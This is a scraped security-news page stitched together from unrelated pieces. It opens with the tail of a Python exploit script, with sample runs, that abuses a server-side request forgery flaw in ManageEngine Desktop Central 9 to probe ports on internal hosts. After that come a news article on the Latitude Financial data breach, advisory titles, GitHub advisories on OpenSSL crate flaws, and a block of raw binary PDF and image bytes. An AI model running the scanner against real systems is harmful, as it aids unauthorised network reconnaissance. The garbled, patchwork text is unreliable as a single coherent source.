cookie,'Connection': 'keep-alive'},verify=False, timeout=10)        text = response.text        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if ('updateRefMsgCookie' in text):            return colored('Cookie lost',"yellow")        if d == "0":            print ('Time response: ' + str(rest) + '\n' + text + '\n')        if (seconds > 5.0):            return colored('open',"green")        else:            return colored('closed',"red")    except:        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if (seconds > 10.0):            return colored('open',"green")        else:            return colored('closed',"red")    return colored('unknown',"yellow")if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -SSRF Open ports",required=True)    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9- SSRF Open ports",required=True)    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central9 - SSRF Open ports (0 print or 1 no print)",required=False)    args = parser.parse_args()    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')And:$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:8080 open$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:7777 closed

Desktop Central 9.1.0 CRLF Injection / Server-Side Request Forgery

By Waqas
The CEO of Latitude Financial, Ahmed Fahour, has expressed disappointment in the incident and apologized unreservedly to customers.
This is a post from HackRead.com Read the original post: Latitude Financial Data Breach: 14 Million Customers Affected

****The Australian consumer lender, Latitude Financial, has suffered a major cyber attack, leading to a data breach of passport and driver license numbers, impacting 14 million customers in Australia and New Zealand.****

Latitude Financial, a consumer lender that provides personal loans and credit to its customers, has disclosed that it suffered a data breach in mid-March, which resulted in the theft of 14 million customer records.

The data that was stolen includes driver’s licenses, passports, and financial statements. Initially, the lender downplayed the impact of the cyber attack, but it has now emerged that the scale of the breach is much greater than previously reported.

According to a forensic review conducted by the company, approximately 7.9 million Australian and New Zealand driver license numbers were stolen, of which around 3.2 million were provided in the last decade.

In addition, according to ABC Australia, approximately 53,000 passport numbers and 100 monthly statements were also stolen. The breach also included 6.1 million records dating back to at least 2005, of which around 5.7 million were provided before 2013.

While the stolen records do not contain all personal information, they do include some of the following: name, address, telephone, and date of birth. The CEO of Latitude Financial, Ahmed Fahour, has expressed disappointment in the incident and apologized unreservedly to customers.

The latest news should not come as a surprise, as Australia has been making headlines for all the wrong reasons in the field of cybersecurity. From data breaches on financial institutions to defence organizations, the country has recently been rattled by cyber attacks.

**MORE CONTEXT**

*   Hackers stole 738GB of Australian govt agency data
*   Australian Navy’s Vessels and Fighter Jets data stolen
*   Australian trading giant ACY Securities leaks user data
*   Australia’s largest telecom firm Optus suffers data breach

The company is working with impacted customers and applicants to minimize the risk and disruption to them, including reimbursing the cost of replacing their ID documents. Latitude Financial is also committed to conducting a full review of the incident.

The company had to take some of its systems offline when the breach was discovered and is still unable to help customers with specific account inquiries. Fahour says the company’s employees are working tirelessly to get its systems back online.

The incident has once again highlighted the importance of cybersecurity measures and the need for companies to take all necessary steps to protect their customers’ data.

1.  Acer data breach: hacker sells trove of stolen data
2.  LockBit ransomware claims to hack SpaceX contractor
3.  20m Instant Checkmate & TruthFinder accounts leaked
4.  PayPal sued over data breach that impacted 35k users
5.  DNA testing service to pay $400k for breach it ignored

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Latitude Financial Data Breach: 14 Million Customers Affected

ComponentSpace.Saml2 4.4.0 Missing SSL Certificate Validation.

%PDF-1.7 %���� 1 0 obj <>/Metadata 617 0 R/ViewerPreferences 618 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/XObject<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 595.32 841.92\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��V�n�0��?�Q\*���l��I��zrPe�1���6�'�/�t��-�M���;�C���Z�Z�����d�\\Yݘ9\\%�m���1ɴ\\��ҭl�̾}q>�ޔs���h\_À!�O���\\��)���ք��wP��������0��8(-�C�2̡XS��,��6��v�=�N��\*���apL�}��O�p|1�����:g�ݬO�u}��J\`�@sL�����}d9��@EM,��x �v���膦h���$�<����O����j�:�"r�&VQY����'�{J�s���>�/�i���f)e�Y��r�=J��� �\[�~ �/>��uWq��-�q�o< ��l�l���m����c��(�.���Z=\`R#�&f�����w�����G�S�j�iJ U}Ze���7����a��7��{c��OHΐO���U�!� ��~{�.k�=�l\].MG��A2��.&gG�^�r�� 3�Α�{Lp����W�v֐��R�gՕbλ�?s��� �IL������?���)x�y�Uta\[�^4�M�.�q��H���� ��7D\_� YN����1�dnMIެ"��?��P?� endstream endobj 5 0 obj <> endobj 6 0 obj <> endobj 7 0 obj <> endobj 8 0 obj <> endobj 9 0 obj <> stream ����JFIF����C    !(!0\*21/\*.-4;K@48G9-.BYBGNPTUT3?\]c\\RbKSTQ��C''Q6.6QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ��L�"�� ���}!1AQa"q2���#B��R��$3br� %&'()\*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br� $4�%�&'()\*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?� UR�A$��B�;PY���5���dZD)�F��0ʩ�B=�^����x�����Ʃ!���#2�����O�g���4��q�s����� ��^+M&�,--Z���>R�zg��T�

CVE-2022-45597

OpenSSL has a `modified` bit that it can set on on `X509_NAME` objects. If this bit is set then the object is not thread-safe even when it appears the code is not modifying the value.

Thanks to David Benjamin (Google) for reporting this issue.


**\`openssl\` \`X509NameBuilder::build\` returned object is not thread safe**

Moderate severity GitHub Reviewed Published Mar 24, 2023 to the GitHub Advisory Database • Updated Mar 24, 2023

GHSA-3gxf-9r58-2ghg: `openssl` `X509NameBuilder::build` returned object is not thread safe

`SubjectAlternativeName` and `ExtendedKeyUsage` arguments were parsed using the OpenSSL function `X509V3_EXT_nconf`. This function parses all input using an OpenSSL mini-language which can perform arbitrary file reads.

Thanks to David Benjamin (Google) for reporting this issue.


**\`openssl\` \`SubjectAlternativeName\` and \`ExtendedKeyUsage::other\` allow arbitrary file read**

High severity GitHub Reviewed Published Mar 24, 2023 to the GitHub Advisory Database • Updated Mar 24, 2023

Tag

#ssl